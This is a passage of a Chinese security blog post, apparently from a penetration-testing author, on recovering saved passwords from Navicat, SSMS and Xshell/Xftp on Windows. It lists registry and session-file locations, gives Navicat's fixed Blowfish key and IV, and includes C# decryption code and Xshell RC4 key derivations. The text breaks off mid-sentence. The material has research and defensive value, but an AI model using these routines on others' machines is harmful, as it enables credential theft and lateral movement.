<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|Lato:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="内网渗透,C#,Tools,编程之道,Decrypt,">





  <link rel="alternate" href="/atom.xml" title="RcoIl的窝" type="application/atom+xml">




  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.png?v=5.1.0">






<meta name="description" content="这是一篇对密码已保存在 Windwos 系统上的部分程序进行解析。">
<meta name="keywords" content="内网渗透,C#,Tools,编程之道,Decrypt">
<meta property="og:type" content="article">
<meta property="og:title" content="【编程】SharpDecryptPwd">
<meta property="og:url" content="https://rcoil.me/2019/09/【编程】SharpDecryptPwd/index.html">
<meta property="og:site_name" content="RcoIl的窝">
<meta property="og:description" content="这是一篇对密码已保存在 Windwos 系统上的部分程序进行解析。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-08-23_16-34-53.png">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/EncryptionPipeline.png">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-08-27_12-48-37.png">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-08-23_15-51-03.png">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-08-22_09-27-08.png">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-08-22_09-28-25.png">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-08-23_09-32-36.png">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-08-23_14-40-13.png">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-08-26_09-47-20.png">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-08-26_10-17-43.png">
<meta property="og:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-10-11_17-49-10.png">
<meta property="og:updated_time" content="2019-11-01T02:28:14.624Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【编程】SharpDecryptPwd">
<meta name="twitter:description" content="这是一篇对密码已保存在 Windwos 系统上的部分程序进行解析。">
<meta name="twitter:image" content="https://rcoil.me/image/【编程】SharpDecryptPwd/blog_2019-08-23_16-34-53.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '6230266985318450000',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://rcoil.me/2019/09/【编程】SharpDecryptPwd/">





  <title> 【编程】SharpDecryptPwd | RcoIl的窝 </title>
</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ce3d1967864bac5f69f1c1a6042e5577";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">RcoIl的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-count">
          <a href="/count" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-fa fa-free-code-camp"></i> <br>
            
            阅读榜
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope="" itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://rcoil.me/2019/09/【编程】SharpDecryptPwd/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="RcoIl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RcoIl的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                【编程】SharpDecryptPwd
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-09-01T14:37:56+08:00">
                2019-09-01
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/编程之道/" itemprop="url" rel="index">
                    <span itemprop="name">编程之道</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/09/【编程】SharpDecryptPwd/" class="leancloud_visitors" data-flag-title="【编程】SharpDecryptPwd">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                <!--
				<i class="fa fa-eye"></i>
				-->
				<i class="fa fa-thermometer-three-quarters" aria-hidden="true"></i>
               </span>
               
                 <span class="post-meta-item-text">热度 </span>
               
                 <span class="leancloud-visitors-count"></span>
				 <span>℃</span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>这是一篇对密码已保存在 Windwos 系统上的部分程序进行解析。</p>
<a id="more"></a>
<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>在 <code>Windows</code> 系统下保存密码，无非就只存在于两个位置：<strong><em>注册表</em></strong>、<strong><em>文件</em></strong>。所以下文主要也是从注册表项、session文件中获取相关加密后的密码字段。且文章中所涉及的知识点，出处全在文末来源参考中，本文仅仅是个人的理解及整合。</p>
<p>主要对以下几个程序进行解析</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1、Navicat PremiumSoft</span><br><span class="line">2、SQL<span class="built_in"> Server </span>Management Studio</span><br><span class="line">3、Xmanager --&gt; Xshell,Xftp</span><br><span class="line">4、TeamView</span><br><span class="line">5、FileZille</span><br><span class="line"><span class="built_in">..</span><span class="built_in">..</span></span><br></pre></td></tr></table></figure>
<p><strong>PS:</strong> 可以使用 <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procmon" target="_blank" rel="noopener">Process Monitor </a> 监测进程的操作。</p>
<h2 id="0x01-Navicat-PremiumSoft"><a href="#0x01-Navicat-PremiumSoft" class="headerlink" title="0x01 Navicat PremiumSoft"></a>0x01 Navicat PremiumSoft</h2><p>​        <code>Navicat</code> 的 session 信息是保存在注册表中的。以 <code>MySql</code> 为例</p>
<p><img src="/image/【编程】SharpDecryptPwd/blog_2019-08-23_16-34-53.png" alt=""></p>
<p><center> Navicat 中的 MySQL 配置（注册表路径）</center><br>​        上图注册表中，保存着我们需要的<strong><em>Host</em></strong>、<strong><em>UserName</em></strong>、<strong><em>PassWord</em></strong>等字段。以下是数据库类型对应注册表路径表</p>
<table><tr><th width="20%" bgcolor="#eea236">数据库类型</th><th width="80%" style="text-align:center" bgcolor="rgb(92," 184,="" 92)="">注册表路径</th></tr><tr><td> MySQL </td><td> HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers</td></tr><tr><td> MariaDB </td><td> HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers</td></tr><tr><td> MongoDB </td><td> HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB\Servers</td></tr><tr><td> Microsoft SQL </td><td> HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers</td></tr><tr><td> Oracle </td><td> HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers</td></tr><tr><td> PostgreSQL </td><td> HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers</td></tr><tr><td> SQLite </td><td> HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers</td></tr></table>



<h3 id="1-1-如何加密"><a href="#1-1-如何加密" class="headerlink" title="1.1 如何加密"></a>1.1 如何加密</h3><p>Navicat 使用 <code>Blowfish算法（河豚密码）</code>加密密码字符串。以下是 Navicat 所做的事情：</p>
<ul>
<li>生成密钥</li>
</ul>
<ol>
<li>Navicat使用SHA-1算法生成160位密钥；</li>
<li>对 <code>3DC5CA39</code> 字符串取其 <code>SHA-1摘要</code>，长度为8个字节，这字符串是 <code>Blowfish算法</code>中使用的密钥；</li>
<li>确切的值是：<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">byte</span>[] Key = &#123;</span><br><span class="line">	<span class="number">0x42</span>, <span class="number">0xCE</span>, <span class="number">0xB2</span>, <span class="number">0x71</span>, <span class="number">0xA5</span>, <span class="number">0xE4</span>, <span class="number">0x58</span>, <span class="number">0xB7</span>, <span class="number">0x4A</span>, <span class="number">0xEA</span>, <span class="number">0x93</span>, <span class="number">0x94</span>,</span><br><span class="line">	<span class="number">0x79</span>, <span class="number">0x22</span>, <span class="number">0x35</span>, <span class="number">0x43</span>, <span class="number">0x91</span>, <span class="number">0x87</span>, <span class="number">0x33</span>, <span class="number">0x40</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<ul>
<li>初始化向量（IV）</li>
</ul>
<ol>
<li>因为 <code>Blowfish算法</code>每次只能加密一个<strong>8字节长的块</strong>；</li>
<li>所以开始时，Navicat 用 <code>0xFF</code> 填充一个<strong>8字节长的块</strong>，然后利用上面提到的 Key 进行 Blowfish 加密，得到 8字节长的初始向量（IV）；</li>
<li>确切的值是：<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">byte</span>[] IV = &#123;</span><br><span class="line">	<span class="number">0xD9</span>, <span class="number">0xC7</span>, <span class="number">0xC3</span>, <span class="number">0xC8</span>, <span class="number">0x87</span>, <span class="number">0x0D</span>, <span class="number">0x64</span>, <span class="number">0xBD</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<ul>
<li>加密 rawPass 字符串</li>
</ul>
<ol>
<li><strong>rawPass</strong> 字符串是ASCII字符串，且不考虑 “NULL” 终止符。</li>
<li>Navicat 使用管道来加密 <strong>rawPass</strong> 字符串。管道如下所示：</li>
</ol>
<p><img src="/image/【编程】SharpDecryptPwd/EncryptionPipeline.png" alt=""></p>
<p><center>Blowfish 加密</center><br><strong><em>注意：</em></strong>每个明文块都是一个8字节长的块。只有当最后一个明文块不是8字节长时，才能执行上图中显示的最后一步。</p>
<h3 id="1-2-加密过程（C-）"><a href="#1-2-加密过程（C-）" class="headerlink" title="1.2 加密过程（C#）"></a>1.2 加密过程（C#）</h3><figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">string</span> <span class="title">EncryptString</span>(<span class="params"><span class="keyword">string</span> plaintext</span>)</span></span><br><span class="line"><span class="function"></span>        &#123;</span><br><span class="line">            <span class="keyword">byte</span>[] plaintext_bytes = Encoding.UTF8.GetBytes(plaintext);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">byte</span>[] CV = Enumerable.Repeat&lt;<span class="keyword">byte</span>&gt;(<span class="number">0xFF</span>, Blowfish.BlockSize).ToArray();</span><br><span class="line">            blowfishCipher.Encrypt(CV, Blowfish.Endian.Big);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">string</span> ret = <span class="string">""</span>;</span><br><span class="line">            <span class="keyword">int</span> blocks_len = plaintext_bytes.Length / Blowfish.BlockSize;</span><br><span class="line">            <span class="keyword">int</span> left_len = plaintext_bytes.Length % Blowfish.BlockSize;</span><br><span class="line">            <span class="keyword">byte</span>[] temp = <span class="keyword">new</span> <span class="keyword">byte</span>[Blowfish.BlockSize];</span><br><span class="line">            <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; blocks_len; ++i) &#123;</span><br><span class="line">                Array.Copy(plaintext_bytes, Blowfish.BlockSize * i, temp, <span class="number">0</span>, Blowfish.BlockSize);</span><br><span class="line">                XorBytes(temp, CV, Blowfish.BlockSize);</span><br><span class="line">                blowfishCipher.Encrypt(temp, Blowfish.Endian.Big);</span><br><span class="line">                XorBytes(CV, temp, Blowfish.BlockSize);</span><br><span class="line"></span><br><span class="line">                ret += ByteArrayToString(temp);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (left_len != <span class="number">0</span>) &#123;</span><br><span class="line">                blowfishCipher.Encrypt(CV, Blowfish.Endian.Big);</span><br><span class="line">                XorBytes(CV,</span><br><span class="line">                         plaintext_bytes.Skip(blocks_len * Blowfish.BlockSize).Take(left_len).ToArray(),</span><br><span class="line">                         left_len);</span><br><span class="line">                ret += ByteArrayToString(CV.Take(left_len).ToArray());</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="1-3-解密过程"><a href="#1-3-解密过程" class="headerlink" title="1.3 解密过程"></a>1.3 解密过程</h3><figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">string</span> <span class="title">DecryptString</span>(<span class="params"><span class="keyword">string</span> ciphertext</span>) </span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">byte</span>[] ciphertext_bytes = StringToByteArray(ciphertext);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">byte</span>[] CV = Enumerable.Repeat&lt;<span class="keyword">byte</span>&gt;(<span class="number">0xFF</span>, Blowfish.BlockSize).ToArray();</span><br><span class="line">    blowfishCipher.Encrypt(CV, Blowfish.Endian.Big);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">byte</span>[] ret = <span class="keyword">new</span> <span class="keyword">byte</span>[<span class="number">0</span>];</span><br><span class="line">    <span class="keyword">int</span> blocks_len = ciphertext_bytes.Length / Blowfish.BlockSize;</span><br><span class="line">    <span class="keyword">int</span> left_len = ciphertext_bytes.Length % Blowfish.BlockSize;</span><br><span class="line">    <span class="keyword">byte</span>[] temp = <span class="keyword">new</span> <span class="keyword">byte</span>[Blowfish.BlockSize];</span><br><span class="line">    <span class="keyword">byte</span>[] temp2 = <span class="keyword">new</span> <span class="keyword">byte</span>[Blowfish.BlockSize];</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; blocks_len; ++i) &#123;</span><br><span class="line">        Array.Copy(ciphertext_bytes, Blowfish.BlockSize * i, temp, <span class="number">0</span>, Blowfish.BlockSize);</span><br><span class="line">        Array.Copy(temp, temp2, Blowfish.BlockSize);</span><br><span class="line">        blowfishCipher.Decrypt(temp, Blowfish.Endian.Big);</span><br><span class="line">        XorBytes(temp, CV, Blowfish.BlockSize);</span><br><span class="line">        ret = ret.Concat(temp).ToArray();</span><br><span class="line">        XorBytes(CV, temp2, Blowfish.BlockSize);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (left_len != <span class="number">0</span>) &#123;</span><br><span class="line">        Array.Clear(temp, <span class="number">0</span>, temp.Length);</span><br><span class="line">        Array.Copy(ciphertext_bytes, Blowfish.BlockSize * blocks_len, temp, <span class="number">0</span>, left_len);</span><br><span class="line">        blowfishCipher.Encrypt(CV, Blowfish.Endian.Big);</span><br><span class="line">        XorBytes(temp, CV, Blowfish.BlockSize);</span><br><span class="line">        ret = ret.Concat(temp.Take(left_len).ToArray()).ToArray();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> Encoding.UTF8.GetString(ret);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>效果如下：</strong></p>
<p><img src="/image/【编程】SharpDecryptPwd/blog_2019-08-27_12-48-37.png" alt=""></p>
<p><center> Navicat PremiumSoft 解密结果</center></p>
<h2 id="0x02-SSMS"><a href="#0x02-SSMS" class="headerlink" title="0x02 SSMS"></a>0x02 SSMS</h2><p>​以 <code>session</code> 文件名及位置来划分，SSMS 可以分为 3 个大版本。（保存的文件都是标准的.net二进制序列化文件）</p>
<table><tr><th width="20%" bgcolor="#eea236">Version </th><th width="80%" style="text-align:center" bgcolor="rgb(92," 184,="" 92)="">Session File Path</th></tr><tr><td> SSMS 2005 </td><td> %appdata%\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat</td></tr><tr><td> SSMS 2008 </td><td> %appdata%\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin</td></tr><tr><td> SSMS Other </td><td> %appdata%\Microsoft\SQL Server Management Studio\xxxx\SqlStudio.bin</td></tr></table>

<p>这章节，所要表达的内容在 <a href="http://www.zcgonvh.com/post/SQL_Server_Management_Studio_saved_password_dumper.html" target="_blank" rel="noopener">SQL Server Management Studio密码导出工具</a> 当中已经分析得很详细了，故不多写。</p>
<p><strong><em>PS：</em></strong>因为要加载私有程序集，故此程序无法在 <code>Cobalt Strike</code> 中使用，原因未知。</p>
<p><img src="/image/【编程】SharpDecryptPwd/blog_2019-08-23_15-51-03.png" alt=""></p>
<p><center> SharpSSMSPwd 解密结果</center></p>
<h2 id="0x03-Xmanager"><a href="#0x03-Xmanager" class="headerlink" title="0x03 Xmanager"></a>0x03 Xmanager</h2><p>​        有人问 session 文件里保存的密码是以什么方式保存的，被盗了后果是否很严重？<br>官方给出了下面的答案</p>
<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">-What <span class="keyword">is</span> the obfuscation algorithm?</span><br><span class="line"></span><br><span class="line">It <span class="keyword">is</span> <span class="keyword">not</span> obfuscating password. Xshell <span class="keyword">uses</span> RC4 <span class="keyword">with</span> SHA256.</span><br></pre></td></tr></table></figure>
<p>当然，这是 5.1 版本之后所使用的。</p>
<p>如今的 <code>Xmanager</code> 大致可分为 2 个大版本。版本名及产生的 <code>session</code> 文件位置如下：</p>
<table><tr><th width="20%" bgcolor="#eea236">产品 </th><th width="80%" style="text-align:center" bgcolor="rgb(92," 184,="" 92)="">会话文件位置</th></tr><tr><td> XShell 5 </td><td> %userprofile%\Documents\NetSarang\Xshell\Sessions</td></tr><tr><td> XFtp 5 </td><td> %userprofile%\Documents\NetSarang\Xftp\Sessions</td></tr><tr><td> XShell 6 </td><td> %userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions</td></tr><tr><td> XFtp 6 </td><td> %userprofile%\Documents\NetSarang Computer\6\Xftp\Sessions</td></tr></table>

<p>以下以 <code>XShell 6</code> 为例</p>
<p><img src="/image/【编程】SharpDecryptPwd/blog_2019-08-22_09-27-08.png" alt=""></p>
<p><img src="/image/【编程】SharpDecryptPwd/blog_2019-08-22_09-28-25.png" alt=""></p>
<h3 id="3-1-如何加密"><a href="#3-1-如何加密" class="headerlink" title="3.1 如何加密"></a>3.1 如何加密</h3><p>​    版本的不同，其加密方式也不一样。以下为默认设置下的加密行为。</p>
<ul>
<li><p><strong>版本 &lt; 5.1</strong></p>
<p><code>Xshell</code> 采用以字符串<code>!X@s#h$e%l^l&amp;</code> 的 MD5 值作为作为 <code>RC4 加密算法</code>中的密钥，以下是加密实现：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> ARC4</span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#MD5 = ba2d9b7e9cca73d152b26772662df55e</span></span><br><span class="line">cipher = ARC4.new(md5(<span class="string">b'!X@s#h$e%l^l&amp;'</span>).digest())</span><br><span class="line">print(b64encode(cipher.encrypt(<span class="string">b'RcoIl'</span>)).decode())</span><br><span class="line"></span><br><span class="line"><span class="comment"># +amcdP4=</span></span><br></pre></td></tr></table></figure>
<p><code>Xftp</code> 同理，以 <code>!X@s#c$e%l^l&amp;</code> 的 MD5 值作为密钥，与 Xshell 所使用的字符串仅一个字符之分。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> ARC4</span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#MD5 = 306e9835de9291d227bb28b2f72dca33</span></span><br><span class="line">cipher = ARC4.new(md5(<span class="string">b'!X@s#c$e%l^l&amp;'</span>).digest())</span><br><span class="line">print(b64encode(cipher.encrypt(<span class="string">b'RcoIl'</span>)).decode())</span><br><span class="line"></span><br><span class="line"><span class="comment"># SvmUuQg=</span></span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>版本 = 5.1 or 5.2</strong></p>
<p><code>Xshell</code> 和 <code>Xftp</code> 都使用 <code>SHA-256 摘要算法</code>生成密钥，作为 <code>RC4 加密</code>中使用的密钥。</p>
<p>以当前<code>用户账户的 SID</code> 作为 SHA-256 摘要，长度为 32 个字节的数组。SID 可通过 <code>whoami /user</code> 进行获取，如下所示：</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\RcoIl&gt;whoami /user</span><br><span class="line"></span><br><span class="line">用户信息</span><br><span class="line">----------------</span><br><span class="line"></span><br><span class="line">用户名         SID</span><br><span class="line">============== =============================================</span><br><span class="line">rcoil-pc\rcoil S<span class="number">-1</span><span class="number">-5</span><span class="number">-21</span><span class="number">-3990929841</span><span class="number">-153547143</span><span class="number">-3340509336</span><span class="number">-1001</span></span><br><span class="line"></span><br><span class="line">SHA<span class="number">-256</span>: a6a7f87e9ab607e8ec70446569ff86919a55417c9259b8e866afb1403fb17a27</span><br><span class="line"></span><br><span class="line"><span class="keyword">byte</span>[] Key = &#123;</span><br><span class="line">	<span class="number">0xA6</span>, <span class="number">0xA7</span>, <span class="number">0xF8</span>, <span class="number">0x7E</span>, <span class="number">0x9A</span>, <span class="number">0xB6</span>, <span class="number">0x07</span>, <span class="number">0xE8</span>, <span class="number">0xEC</span>, <span class="number">0x70</span>, <span class="number">0x44</span>, <span class="number">0x65</span>,</span><br><span class="line">	<span class="number">0x69</span>, <span class="number">0xFF</span>, <span class="number">0x86</span>, <span class="number">0x91</span>, <span class="number">0x9A</span>, <span class="number">0x55</span>, <span class="number">0x41</span>, <span class="number">0x7C</span>, <span class="number">0x92</span>, <span class="number">0x59</span>, <span class="number">0xB8</span>, <span class="number">0xE8</span>,</span><br><span class="line">	<span class="number">0x66</span>, <span class="number">0xAF</span>, <span class="number">0xB1</span>, <span class="number">0x40</span>, <span class="number">0x3F</span>, <span class="number">0xB1</span>, <span class="number">0x7A</span>, <span class="number">0x27</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>版本 &gt; 5.2</strong></p>
<p>而 5.2 版本之后的 <code>Xshell</code> 与 <code>Xftp</code>，与之前只是多加了一个用户名。如</p>
